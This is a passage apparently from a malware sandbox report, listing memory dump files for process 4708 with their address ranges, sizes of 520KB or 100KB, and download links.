      • memory/4708-190-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-188-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-242-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-241-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-239-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-238-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-237-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-266-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4708-269-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4708-270-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4708-235-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-274-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-275-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-233-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-282-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-283-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-290-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-291-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-298-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-299-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-306-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-307-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-314-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-315-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-322-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-323-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-330-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-331-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-338-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-339-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download